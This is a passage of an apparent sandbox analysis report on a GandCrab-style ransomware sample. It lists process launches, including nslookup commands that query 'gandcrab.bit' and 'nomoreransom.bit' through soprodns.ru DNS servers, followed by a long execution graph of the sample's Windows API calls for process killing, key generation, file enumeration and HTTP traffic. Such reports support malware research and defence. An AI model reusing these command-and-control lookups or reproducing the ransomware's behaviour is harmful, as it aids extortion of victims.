                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:58
                                      Start time:23:59:07
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:59
                                      Start time:23:59:08
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:60
                                      Start time:23:59:13
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:61
                                      Start time:23:59:13
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:26.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:41.9%
                                        Total number of Nodes:697
                                        Total number of Limit Nodes:17
                                        execution_graph 2475 fc641d6 2483 fc641e0 2475->2483 2476 fc64286 2478 fc64377 VirtualAlloc 2476->2478 2479 fc643a8 VirtualFree 2476->2479 2477 fc64210 lstrcpyW lstrlenW 2477->2476 2477->2483 2478->2479 2480 fc64394 wsprintfW 2478->2480 2481 fc67c10 10 API calls 2479->2481 2480->2479 2482 fc643c8 2481->2482 2483->2476 2483->2477 2484 fc64bd5 2487 fc664f0 VirtualFree VirtualFree 2484->2487 2486 fc64be4 2487->2486 1687 fc64bf0 1688 fc64c0d CreateThread 1687->1688 1689 fc64c35 1688->1689 1690 fc64c2b FindCloseChangeNotification 1688->1690 1691 fc64950 Sleep 1688->1691 1690->1689 1736 fc64600 1691->1736 1694 fc64972 CreateThread 1696 fc64990 WaitForSingleObject 1694->1696 1697 fc649bc 1694->1697 2212 fc62d30 1694->2212 1695 fc6496a ExitProcess 1698 fc649a6 TerminateThread 1696->1698 1699 fc649b2 CloseHandle 1696->1699 1752 fc646f0 CreateToolhelp32Snapshot VirtualAlloc 1697->1752 1698->1699 1699->1697 1701 fc649c1 1763 fc640e0 1701->1763 1705 fc649ce 1706 fc64a1c VirtualAlloc 1705->1706 1713 fc64a6b 1705->1713 1708 fc64a63 ExitProcess 1706->1708 1709 fc64a39 GetModuleFileNameW 1706->1709 1707 fc64aa5 1715 fc64acf lstrlenA VirtualAlloc CryptStringToBinaryA 1707->1715 1718 fc64b18 1707->1718 1830 fc63be0 1709->1830 1713->1707 1714 fc64a8f Sleep 1713->1714 1786 fc65880 1713->1786 1714->1713 1717 fc64b10 ExitProcess 1715->1717 1715->1718 1841 fc64030 1718->1841 1720 fc64b35 1844 fc64000 1720->1844 1721 fc64b42 1850 fc63e20 VirtualAlloc GetTickCount 1721->1850 1725 fc64b4a DeleteCriticalSection 1858 fc63aa0 AllocateAndInitializeSid 1725->1858 1727 fc64b5a 1728 fc64b63 VirtualAlloc 1727->1728 1862 fc643e0 1727->1862 1730 fc64b80 GetModuleFileNameW 1728->1730 1731 fc64baa 1728->1731 1734 fc63be0 17 API calls 1730->1734 1732 fc64bb3 ShellExecuteW 1731->1732 1733 fc64bcd ExitThread 1731->1733 1732->1733 1735 fc64b99 VirtualFree 1734->1735 1735->1731 1869 fc639f0 GetProcessHeap 1736->1869 1738 fc64637 1870 fc67330 1738->1870 1742 fc64649 VirtualAlloc 1743 fc64668 lstrcpyW lstrlenW 1742->1743 1953 fc66f40 1743->1953 1746 fc64699 CreateMutexW GetLastError 1747 fc646b1 GetLastError 1746->1747 1748 fc646ba VirtualFree 1746->1748 1747->1748 1979 fc67c10 1748->1979 1753 fc64888 1752->1753 1757 fc6489b 1752->1757 1754 fc64893 Process32FirstW 1753->1754 1753->1757 1754->1757 1755 fc648b0 lstrcmpiW 1756 fc648bf OpenProcess 1755->1756 1755->1757 1756->1757 1758 fc648d1 TerminateProcess CloseHandle 1756->1758 1757->1755 1759 fc648f4 Process32NextW 1757->1759 1758->1757 1759->1757 1760 fc64907 1759->1760 1761 fc6490b VirtualFree 1760->1761 1762 fc64919 FindCloseChangeNotification 1760->1762 1761->1762 1762->1701 1764 fc640fb 1763->1764 1765 fc643c8 1763->1765 2051 fc639f0 GetProcessHeap 1764->2051 1783 fc66420 VirtualAlloc VirtualAlloc 1765->1783 1767 fc64126 1768 fc67330 98 API calls 1767->1768 1769 fc64132 1768->1769 1770 fc67140 16 API calls 1769->1770 1771 fc6413e VirtualAlloc 1770->1771 1772 fc64162 1771->1772 1773 fc66f40 49 API calls 1772->1773 1774 fc64180 1773->1774 1775 fc6418c lstrlenW 1774->1775 1782 fc641c0 1775->1782 1776 fc64286 1778 fc64377 VirtualAlloc 1776->1778 1779 fc643a8 VirtualFree 1776->1779 1777 fc64210 lstrcpyW lstrlenW 1777->1776 1777->1782 1778->1779 1780 fc64394 wsprintfW 1778->1780 1781 fc67c10 10 API calls 1779->1781 1780->1779 1781->1765 1782->1776 1782->1777 2052 fc662b0 CryptAcquireContextW 1783->2052 2060 fc639f0 GetProcessHeap 1786->2060 1788 fc658c4 1789 fc67330 98 API calls 1788->1789 1790 fc658cd 1789->1790 1791 fc67140 16 API calls 1790->1791 1792 fc658d6 VirtualAlloc 1791->1792 1793 fc6590e 1792->1793 1794 fc65d44 1793->1794 1795 fc6597b 6 API calls 1793->1795 1798 fc65d4f VirtualFree 1794->1798 1796 fc659fa lstrlenA 1795->1796 1799 fc65a22 lstrlenA 1796->1799 1800 fc67c10 10 API calls 1798->1800 1803 fc65a72 lstrlenA 1799->1803 1810 fc65a3e lstrlenA 1799->1810 1802 fc65d65 1800->1802 1802->1713 1804 fc65aa1 lstrcatW lstrlenW 1803->1804 1811 fc65a7b lstrlenA 1803->1811 1805 fc66f40 49 API calls 1804->1805 1809 fc65ac9 12 API calls 1805->1809 1807 fc65a6e 1807->1803 1812 fc65b6a lstrlenW 1809->1812 1810->1807 1811->1804 2061 fc69010 1812->2061 1816 fc65bed 1817 fc65c04 CryptBinaryToStringA 1816->1817 1818 fc65c36 lstrlenA VirtualAlloc lstrlenA 1817->1818 1819 fc65c30 GetLastError 1817->1819 1820 fc65c5e lstrlenA 1818->1820 1819->1818 1822 fc65c9e lstrlenA MultiByteToWideChar 1820->1822 1828 fc65c77 lstrlenA 1820->1828 2063 fc654a0 1822->2063 1826 fc65cd6 VirtualFree VirtualFree VirtualFree 1826->1798 1827 fc65d07 VirtualFree VirtualFree VirtualFree 1827->1794 1828->1822 2181 fc63b20 1830->2181 1832 fc63bf6 1833 fc63dfa VirtualFree 1832->1833 1834 fc63aa0 4 API calls 1832->1834 1833->1708 1835 fc63c03 1834->1835 1835->1833 1836 fc63c0b ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1835->1836 1837 fc63de0 ShellExecuteExW 1836->1837 1838 fc63de7 1837->1838 1839 fc63e01 WaitForSingleObject CloseHandle ExitProcess 1837->1839 1838->1837 1840 fc63ded VirtualFree 1838->1840 1840->1833 1842 fc64058 InitializeCriticalSection 1841->1842 1843 fc6403d VirtualAlloc 1841->1843 1842->1720 1842->1721 1843->1842 1845 fc64014 1844->1845 1846 fc63e20 276 API calls 1845->1846 1847 fc6401c 1846->1847 2184 fc664f0 VirtualFree VirtualFree 1847->2184 1849 fc64024 1849->1725 1851 fc63e80 GetDriveTypeW 1850->1851 1852 fc63e95 1851->1852 1852->1851 1853 fc63ede WaitForMultipleObjects GetTickCount 1852->1853 1854 fc63e9a CreateThread 1852->1854 1855 fc63f3f 1853->1855 1854->1852 2185 fc65670 VirtualAlloc 1855->2185 1857 fc63fed 1857->1725 1859 fc63ade GetModuleHandleA GetProcAddress 1858->1859 1860 fc63ada 1858->1860 1861 fc63b00 FreeSid 1859->1861 1860->1727 1861->1727 1863 fc63b20 4 API calls 1862->1863 1864 fc643f4 VirtualAlloc 1863->1864 1866 fc645af GetSystemDirectoryW lstrcatW ShellExecuteW 1864->1866 1867 fc645ab 1864->1867 1868 fc645df VirtualFree 1866->1868 1867->1868 1868->1728 1869->1738 1871 fc6736e 1870->1871 1872 fc67349 VirtualAlloc GetUserNameW 1870->1872 1873 fc67396 1871->1873 1874 fc67374 VirtualAlloc GetComputerNameW 1871->1874 1872->1871 1875 fc673f6 1873->1875 1876 fc673a2 VirtualAlloc 1873->1876 1874->1873 1878 fc67495 1875->1878 1879 fc67400 VirtualAlloc RegOpenKeyExW 1875->1879 1876->1875 1877 fc673b9 1876->1877 2000 fc672b0 RegOpenKeyExW 1877->2000 1883 fc6749f VirtualAlloc VirtualAlloc 1878->1883 1884 fc67599 1878->1884 1881 fc6747e VirtualFree 1879->1881 1882 fc6743c RegQueryValueExW 1879->1882 1881->1878 1887 fc67460 1882->1887 1888 fc67469 GetLastError 1882->1888 1885 fc674d4 wsprintfW RegOpenKeyExW 1883->1885 1889 fc6759f VirtualAlloc 1884->1889 1890 fc675fb 1884->1890 1891 fc6752b 1885->1891 1892 fc67509 RegQueryValueExW 1885->1892 1886 fc673d4 1886->1875 1900 fc673f1 wsprintfW 1886->1900 1895 fc6746f RegCloseKey 1887->1895 1888->1895 1896 fc672b0 5 API calls 1889->1896 1893 fc67601 GetNativeSystemInfo VirtualAlloc 1890->1893 1894 fc6766e 1890->1894 1891->1885 1905 fc6753a RegCloseKey 1891->1905 1907 fc67576 wsprintfW VirtualFree 1891->1907 1892->1891 1897 fc67534 GetLastError 1892->1897 1898 fc67624 1893->1898 1899 fc67647 wsprintfW 1893->1899 1901 fc67688 1894->1901 2005 fc67a10 VirtualAlloc VirtualAlloc 1894->2005 1895->1878 1895->1881 1902 fc675cd 1896->1902 1897->1905 1898->1899 1906 fc67632 wsprintfW ExitProcess 1898->1906 1899->1894 1900->1875 1903 fc677d9 1901->1903 1904 fc67699 VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW 1901->1904 1902->1890 1912 fc672b0 5 API calls 1902->1912 1915 fc67992 1903->1915 1916 fc677e9 VirtualAlloc 1903->1916 1910 fc672b0 5 API calls 1904->1910 1905->1891 1911 fc67549 lstrcmpiW 1905->1911 1907->1884 1914 fc67725 1910->1914 1911->1891 1911->1906 1913 fc675ee wsprintfW 1912->1913 1913->1890 1917 fc6775a wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1914->1917 1918 fc67729 lstrlenW 1914->1918 1919 fc64640 1915->1919 1920 fc6799b VirtualAlloc 1915->1920 1933 fc67840 1916->1933 1923 fc6779d lstrlenW 1917->1923 1924 fc677b4 VirtualFree 1917->1924 1922 fc672b0 5 API calls 1918->1922 1935 fc67140 1919->1935 1920->1919 1921 fc679b9 1920->1921 2023 fc66e90 1921->2023 1922->1917 1923->1924 1924->1903 1927 fc67862 GetDriveTypeW 1927->1933 1929 fc679c4 VirtualFree 1929->1919 1930 fc67889 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1931 fc67963 lstrcatW 1930->1931 1930->1933 1931->1933 1932 fc67983 lstrlenW 1932->1915 1933->1927 1933->1930 1933->1932 1934 fc678fc lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1933->1934 1934->1933 1936 fc67150 1935->1936 1937 fc6718f lstrlenW lstrlenW 1936->1937 1938 fc671aa 1936->1938 1937->1938 1939 fc671b0 lstrlenW lstrlenW 1938->1939 1940 fc671cb 1938->1940 1939->1940 1941 fc671d1 lstrlenW lstrlenW 1940->1941 1942 fc671ec 1940->1942 1941->1942 1943 fc671f2 lstrlenW lstrlenW 1942->1943 1944 fc6720d 1942->1944 1943->1944 1945 fc67213 lstrlenW lstrlenW 1944->1945 1946 fc6722e 1944->1946 1945->1946 1947 fc67234 lstrlenW lstrlenW 1946->1947 1948 fc6724f 1946->1948 1947->1948 1949 fc6725e lstrlenW lstrlenW 1948->1949 1950 fc67279 1948->1950 1949->1950 1951 fc672a7 1950->1951 1952 fc67282 lstrlenW lstrlenW 1950->1952 1951->1742 1952->1742 1954 fc66f7c 1953->1954 1955 fc66f5a lstrcatW lstrcatW lstrcatW lstrcatW 1953->1955 1956 fc66f81 lstrcatW lstrcatW lstrcatW lstrcatW 1954->1956 1957 fc66f9d 1954->1957 1955->1954 1956->1957 1958 fc66fa3 lstrcatW lstrcatW lstrcatW lstrcatW 1957->1958 1959 fc66fbf 1957->1959 1958->1959 1960 fc66fc5 lstrcatW lstrcatW lstrcatW lstrcatW 1959->1960 1961 fc66fe1 1959->1961 1960->1961 1962 fc66fe7 lstrcatW lstrcatW lstrcatW lstrcatW 1961->1962 1963 fc67003 1961->1963 1962->1963 1964 fc67025 1963->1964 1965 fc67009 lstrcatW lstrcatW lstrcatW lstrcatW 1963->1965 1966 fc67047 1964->1966 1967 fc6702b lstrcatW lstrcatW lstrcatW lstrcatW 1964->1967 1965->1964 1968 fc6704d lstrcatW lstrcatW lstrcatW lstrcatW 1966->1968 1969 fc67069 1966->1969 1967->1966 1968->1969 1970 fc6706f lstrcatW lstrcatW lstrcatW lstrcatW 1969->1970 1971 fc6708b 1969->1971 1970->1971 1972 fc67091 VirtualAlloc 1971->1972 1973 fc670fc 1971->1973 1976 fc670c1 wsprintfW 1972->1976 1977 fc670ac wsprintfW 1972->1977 1974 fc67102 lstrcatW lstrcatW lstrcatW lstrcatW 1973->1974 1975 fc6711e lstrlenW 1973->1975 1974->1975 1975->1746 1978 fc670d0 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1976->1978 1977->1978 1978->1973 1980 fc67c1f VirtualFree 1979->1980 1981 fc67c2b 1979->1981 1980->1981 1982 fc67c31 VirtualFree 1981->1982 1983 fc67c3d 1981->1983 1982->1983 1984 fc67c43 VirtualFree 1983->1984 1985 fc67c4f 1983->1985 1984->1985 1986 fc67c55 VirtualFree 1985->1986 1987 fc67c61 1985->1987 1986->1987 1988 fc67c67 VirtualFree 1987->1988 1989 fc67c73 1987->1989 1988->1989 1990 fc67c85 1989->1990 1991 fc67c79 VirtualFree 1989->1991 1992 fc67c97 1990->1992 1993 fc67c8b VirtualFree 1990->1993 1991->1990 1994 fc67c9d VirtualFree 1992->1994 1995 fc67ca9 1992->1995 1993->1992 1994->1995 1996 fc67caf VirtualFree 1995->1996 1997 fc67cbb 1995->1997 1996->1997 1998 fc67cc4 VirtualFree 1997->1998 1999 fc646da 1997->1999 1998->1999 1999->1694 1999->1695 2001 fc672d2 RegQueryValueExW 2000->2001 2002 fc6731e 2000->2002 2003 fc67306 GetLastError RegCloseKey 2001->2003 2004 fc672f1 RegCloseKey 2001->2004 2002->1886 2003->1886 2004->1886 2006 fc67ad2 2005->2006 2007 fc67aac CreateToolhelp32Snapshot 2005->2007 2006->1901 2008 fc67ac4 VirtualFree 2007->2008 2009 fc67add Process32FirstW 2007->2009 2008->2006 2010 fc67bcd VirtualFree FindCloseChangeNotification 2009->2010 2011 fc67afd 2009->2011 2012 fc67bf7 2010->2012 2013 fc67bed VirtualFree 2010->2013 2015 fc67ba7 2011->2015 2016 fc67b10 lstrcmpiW 2011->2016 2018 fc67b4f lstrcatW lstrcatW 2011->2018 2019 fc67b3a lstrcpyW lstrcatW 2011->2019 2021 fc67b87 Process32NextW 2011->2021 2012->1901 2013->2012 2014 fc67bc5 2014->2010 2015->2014 2017 fc67bb5 lstrlenW 2015->2017 2016->2011 2017->2014 2020 fc67b60 lstrlenW 2018->2020 2019->2020 2020->2021 2021->2015 2022 fc67b98 GetLastError 2021->2022 2022->2011 2022->2015 2033 fc67ce0 InternetOpenW 2023->2033 2027 fc66ee6 2028 fc66f11 VirtualFree 2027->2028 2029 fc66eea lstrlenA 2027->2029 2031 fc66f26 InternetCloseHandle 2028->2031 2032 fc66f2d 2028->2032 2029->2028 2030 fc66efa wsprintfW 2029->2030 2030->2028 2031->2032 2032->1919 2032->1929 2034 fc66ea2 VirtualAlloc lstrlenW 2033->2034 2035 fc67ecd InternetOpenW 2033->2035 2036 fc67ef0 2034->2036 2035->2034 2037 fc67f02 InternetCloseHandle 2036->2037 2038 fc67f09 2036->2038 2037->2038 2039 fc67ce0 2 API calls 2038->2039 2040 fc67f10 InternetConnectW 2039->2040 2041 fc67f41 VirtualAlloc wsprintfW HttpOpenRequestW 2040->2041 2042 fc67f38 2040->2042 2043 fc68062 InternetCloseHandle InternetCloseHandle VirtualFree 2041->2043 2044 fc67f91 HttpAddRequestHeadersW 2041->2044 2042->2027 2043->2027 2044->2043 2045 fc67ff8 HttpSendRequestW 2044->2045 2046 fc6800f InternetReadFile 2045->2046 2047 fc6805c GetLastError 2045->2047 2046->2043 2048 fc6802e 2046->2048 2047->2043 2048->2043 2049 fc68037 InternetReadFile 2048->2049 2049->2048 2050 fc6805a 2049->2050 2050->2043 2051->1767 2053 fc66305 CryptGenKey 2052->2053 2054 fc662cf GetLastError 2052->2054 2056 fc66322 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 2053->2056 2057 fc66321 2053->2057 2055 fc662dc CryptAcquireContextW 2054->2055 2058 fc662f5 2054->2058 2055->2058 2059 fc662fc 2055->2059 2056->2058 2057->2056 2058->1705 2059->2053 2060->1788 2062 fc65bcc lstrlenA 2061->2062 2062->1816 2064 fc67ce0 2 API calls 2063->2064 2065 fc654bc 2064->2065 2081 fc65060 VirtualAlloc 2065->2081 2068 fc65503 lstrcatA lstrcatA lstrlenA 2070 fc69010 _memset 2068->2070 2071 fc65592 lstrcpyW 2070->2071 2090 fc653a0 VirtualAlloc GetModuleFileNameW CreateFileW 2071->2090 2073 fc655b2 lstrlenW lstrlenA 2074 fc67ef0 15 API calls 2073->2074 2076 fc655f4 2074->2076 2075 fc65628 VirtualFree VirtualFree VirtualFree 2077 fc65657 InternetCloseHandle 2075->2077 2078 fc6565e 2075->2078 2076->2075 2100 fc65210 lstrlenA VirtualAlloc 2076->2100 2077->2078 2078->1826 2078->1827 2080 fc65614 2080->2075 2082 fc6517f lstrlenA VirtualAlloc VirtualAlloc 2081->2082 2083 fc650d9 2081->2083 2082->2068 2084 fc650fe Sleep 2083->2084 2085 fc65109 lstrlenW VirtualAlloc 2083->2085 2084->2085 2121 fc64e90 CreatePipe 2085->2121 2087 fc65134 lstrcmpiA 2088 fc65147 VirtualFree 2087->2088 2089 fc6515c wsprintfW VirtualFree 2087->2089 2088->2083 2089->2082 2091 fc65487 VirtualFree 2090->2091 2092 fc653f9 CreateFileMappingW 2090->2092 2091->2073 2093 fc65480 CloseHandle 2092->2093 2094 fc65411 MapViewOfFile 2092->2094 2093->2091 2095 fc65477 CloseHandle 2094->2095 2096 fc65427 lstrlenW lstrlenA 2094->2096 2095->2093 2097 fc65444 lstrlenA 2096->2097 2098 fc65468 UnmapViewOfFile 2096->2098 2097->2098 2098->2095 2101 fc65246 CryptStringToBinaryA 2100->2101 2103 fc65385 GetLastError 2101->2103 2104 fc6526c _memset 2101->2104 2105 fc6536c VirtualFree 2103->2105 2106 fc652b0 lstrlenA 2104->2106 2105->2080 2107 fc652ce 2106->2107 2150 fc633e0 2107->2150 2110 fc6538d 2160 fc65190 VirtualAlloc VirtualAlloc 2110->2160 2111 fc652fa 2112 fc65341 2111->2112 2113 fc6531c lstrlenA VirtualAlloc 2111->2113 2117 fc6535d 2112->2117 2119 fc65355 HeapFree 2112->2119 2113->2112 2116 fc65339 lstrcpyA 2113->2116 2116->2112 2118 fc65369 2117->2118 2120 fc65366 HeapFree 2117->2120 2118->2105 2119->2117 2120->2118 2122 fc64fb3 2121->2122 2123 fc64fbd SetHandleInformation 2121->2123 2122->2087 2123->2122 2124 fc64fd3 CreatePipe SetHandleInformation 2123->2124 2124->2122 2125 fc64ffc VirtualAlloc 2124->2125 2126 fc65016 wsprintfW 2125->2126 2127 fc6504b lstrcpyA 2125->2127 2132 fc64c40 2126->2132 2127->2087 2129 fc6502b 2137 fc64de0 2129->2137 2133 fc69010 _memset 2132->2133 2134 fc64c5e CreateProcessW 2133->2134 2135 fc64cb4 CloseHandle CloseHandle 2134->2135 2136 fc64ca9 GetLastError 2134->2136 2135->2129 2136->2129 2142 fc64ded 2137->2142 2138 fc64df6 ReadFile 2139 fc64e65 2138->2139 2138->2142 2140 fc64e83 VirtualFree 2139->2140 2143 fc64cd0 2139->2143 2140->2087 2142->2138 2142->2139 2146 fc64cfb 2143->2146 2144 fc64d35 lstrcpyA 2144->2140 2145 fc64d93 lstrlenA 2147 fc64da0 lstrcpyA 2145->2147 2146->2144 2146->2145 2148 fc64d8d 2146->2148 2147->2140 2148->2144 2164 fc632b0 lstrlenA 2150->2164 2153 fc634d9 ExitProcess 2154 fc63412 2154->2110 2154->2111 2157 fc63483 lstrlenA GetProcessHeap HeapAlloc 2158 fc63407 2157->2158 2159 fc634a5 lstrcpyA 2157->2159 2158->2154 2158->2157 2168 fc63190 2158->2168 2172 fc63200 2158->2172 2159->2158 2161 fc651c0 GetModuleFileNameW 2160->2161 2162 fc651f9 ExitProcess 2160->2162 2161->2162 2163 fc651d2 wsprintfW ShellExecuteW 2161->2163 2163->2162 2165 fc632cf 2164->2165 2166 fc632f8 2164->2166 2167 fc632d0 lstrlenA 2165->2167 2166->2153 2166->2158 2167->2166 2167->2167 2169 fc631b0 lstrcmpiA lstrcmpiA 2168->2169 2170 fc6319e 2168->2170 2169->2158 2170->2169 2171 fc631f1 2170->2171 2171->2158 2179 fc63210 2172->2179 2173 fc6323d 2173->2158 2174 fc63250 lstrlenA GetProcessHeap HeapAlloc 2176 fc6328d 2174->2176 2175 fc6326d 2177 fc63272 lstrlenA GetProcessHeap HeapAlloc 2175->2177 2178 fc63299 2175->2178 2176->2178 2180 fc63291 lstrcpyA 2176->2180 2177->2176 2178->2158 2179->2173 2179->2174 2179->2175 2180->2178 2182 fc69010 _memset 2181->2182 2183 fc63b77 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2182->2183 2183->1832 2184->1849 2186 fc6569c wsprintfW 2185->2186 2211 fc639f0 GetProcessHeap 2186->2211 2189 fc656ef 2190 fc67330 98 API calls 2189->2190 2191 fc656fa 2190->2191 2192 fc67140 16 API calls 2191->2192 2193 fc65705 lstrlenW 2192->2193 2194 fc66f40 49 API calls 2193->2194 2195 fc6571d lstrlenW 2194->2195 2196 fc69010 _memset 2195->2196 2197 fc65766 lstrlenA 2196->2197 2198 fc65782 2197->2198 2199 fc65797 CryptBinaryToStringA 2198->2199 2200 fc657c2 lstrlenA VirtualAlloc lstrlenA 2199->2200 2201 fc657bc GetLastError 2199->2201 2202 fc657ee lstrlenA 2200->2202 2201->2200 2204 fc65822 2202->2204 2208 fc65805 lstrlenA 2202->2208 2205 fc654a0 97 API calls 2204->2205 2207 fc6582e VirtualFree 2205->2207 2209 fc67c10 10 API calls 2207->2209 2208->2204 2210 fc6585d VirtualFree 2209->2210 2210->1857 2211->2189 2233 fc62f50 K32EnumDeviceDrivers 2212->2233 2214 fc62d8c 2215 fc62de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2214->2215 2218 fc62f50 7 API calls 2214->2218 2216 fc62e75 ExitThread 2215->2216 2217 fc62e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2215->2217 2220 fc62ec5 ShowWindow UpdateWindow CreateThread 2217->2220 2221 fc62ebe ExitThread 2217->2221 2219 fc62d99 2218->2219 2219->2215 2226 fc62f50 7 API calls 2219->2226 2222 fc62ef4 GetMessageW 2220->2222 2223 fc62eed CloseHandle 2220->2223 2224 fc62f3d ExitThread 2222->2224 2225 fc62f0b 2222->2225 2223->2222 2227 fc62f17 TranslateMessage DispatchMessageW 2225->2227 2228 fc62dce 2226->2228 2227->2224 2229 fc62f2c GetMessageW 2227->2229 2228->2224 2243 fc630a0 2228->2243 2229->2224 2229->2227 2234 fc62f82 VirtualAlloc 2233->2234 2235 fc62f7d 2233->2235 2236 fc62f9f K32EnumDeviceDrivers 2234->2236 2237 fc62f99 2234->2237 2235->2214 2238 fc62ff2 VirtualFree 2236->2238 2239 fc62fae 2236->2239 2237->2214 2238->2214 2239->2238 2240 fc62fc0 K32GetDeviceDriverBaseNameW 2239->2240 2240->2239 2241 fc62fd9 lstrcmpiW 2240->2241 2241->2239 2242 fc63009 VirtualFree 2241->2242 2242->2214 2244 fc62f50 7 API calls 2243->2244 2245 fc63151 2244->2245 2246 fc62f50 7 API calls 2245->2246 2251 fc62ddb 2245->2251 2247 fc63160 2246->2247 2248 fc62f50 7 API calls 2247->2248 2247->2251 2249 fc6316c 2248->2249 2250 fc62f50 7 API calls 2249->2250 2249->2251 2250->2251 2251->2224 2252 fc62ad0 VirtualAlloc 2251->2252 2253 fc62b02 GetModuleFileNameW GetTempPathW 2252->2253 2255 fc62b48 2253->2255 2256 fc62b53 lstrlenW 2255->2256 2257 fc62b4c 2255->2257 2267 fc68150 CryptAcquireContextW 2256->2267 2296 fc62960 lstrlenW 2257->2296 2260 fc62b8e GetEnvironmentVariableW 2262 fc62bac 2260->2262 2261 fc62c45 ExitThread 2263 fc62bd8 lstrcatW lstrcatW lstrcatW 2262->2263 2266 fc62bb0 2262->2266 2279 fc62890 CreateFileW 2263->2279 2265 fc62c2f wsprintfW 2265->2257 2266->2261 2266->2265 2268 fc6817b VirtualAlloc 2267->2268 2269 fc68269 2267->2269 2271 fc68272 CryptReleaseContext VirtualFree 2268->2271 2272 fc681ab 2268->2272 2269->2260 2271->2260 2272->2271 2273 fc681b3 GetModuleHandleA 2272->2273 2274 fc68207 GetProcAddress 2273->2274 2275 fc681f9 LoadLibraryA 2273->2275 2276 fc6824e 2274->2276 2278 fc68216 2274->2278 2275->2274 2275->2276 2277 fc68250 CryptReleaseContext VirtualFree 2276->2277 2277->2269 2278->2276 2278->2277 2278->2278 2280 fc628b8 GetFileSize 2279->2280 2281 fc628f9 2279->2281 2301 fc63030 2280->2301 2281->2266 2284 fc63030 7 API calls 2285 fc628d5 CreateFileMappingW 2284->2285 2286 fc62902 MapViewOfFile 2285->2286 2287 fc628f2 CloseHandle 2285->2287 2288 fc62916 2286->2288 2289 fc62948 CloseHandle CloseHandle 2286->2289 2287->2281 2290 fc63030 7 API calls 2288->2290 2289->2266 2291 fc6291b 2290->2291 2292 fc6292b 2291->2292 2306 fc682a0 CryptAcquireContextW 2291->2306 2317 fc62830 CreateFileW 2292->2317 2297 fc68150 9 API calls 2296->2297 2298 fc629ad RegCreateKeyExW 2297->2298 2299 fc62ac0 2298->2299 2300 fc62a8e lstrlenW RegSetValueExW RegCloseKey 2298->2300 2299->2261 2300->2261 2302 fc62f50 7 API calls 2301->2302 2303 fc6307f 2302->2303 2304 fc628c8 2303->2304 2305 fc62f50 7 API calls 2303->2305 2304->2284 2305->2304 2307 fc68392 2306->2307 2308 fc682ce VirtualAlloc 2306->2308 2307->2292 2310 fc6839b CryptReleaseContext VirtualFree 2308->2310 2311 fc682f8 2308->2311 2310->2292 2311->2310 2312 fc68301 GetModuleHandleA 2311->2312 2313 fc68347 LoadLibraryA 2312->2313 2314 fc68355 GetProcAddress 2312->2314 2313->2314 2315 fc68379 CryptReleaseContext VirtualFree 2313->2315 2314->2315 2316 fc68364 2314->2316 2315->2307 2316->2315 2318 fc6287f UnmapViewOfFile 2317->2318 2319 fc6285b 2317->2319 2318->2289 2320 fc62873 2319->2320 2321 fc6285f WriteFile 2319->2321 2322 fc62878 FindCloseChangeNotification 2320->2322 2321->2320 2321->2322 2322->2318 2323 fc65ec0 2324 fc65ee2 2323->2324 2325 fc65f0e GetPEB 2324->2325 2326 fc65f28 2325->2326 2326->2326 2327 fc66de0 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2330 fc66c90 2327->2330 2329 fc66e70 VirtualFree ExitThread 2349 fc66640 VirtualAlloc 2330->2349 2332 fc66ca6 2333 fc66dd4 2332->2333 2361 fc66a40 lstrlenW lstrcatW FindFirstFileW 2332->2361 2333->2329 2335 fc66cb5 2335->2333 2376 fc66be0 VirtualAlloc wsprintfW CreateFileW 2335->2376 2337 fc66cc2 lstrlenW lstrcatW FindFirstFileW 2338 fc66d04 2337->2338 2339 fc66cf8 2337->2339 2340 fc66d10 lstrcmpW 2338->2340 2339->2329 2341 fc66db3 FindNextFileW 2340->2341 2342 fc66d2a lstrcmpW 2340->2342 2341->2340 2343 fc66dcb FindClose 2341->2343 2342->2341 2344 fc66d40 lstrcatW 2342->2344 2343->2333 2345 fc66d53 lstrcatW 2344->2345 2348 fc66d6c 2344->2348 2346 fc66c90 102 API calls 2345->2346 2346->2348 2348->2341 2382 fc66950 VirtualAlloc wsprintfW 2348->2382 2351 fc66667 2349->2351 2350 fc6676c VirtualFree 2350->2332 2351->2350 2352 fc666e7 SHGetSpecialFolderPathW 2351->2352 2353 fc66705 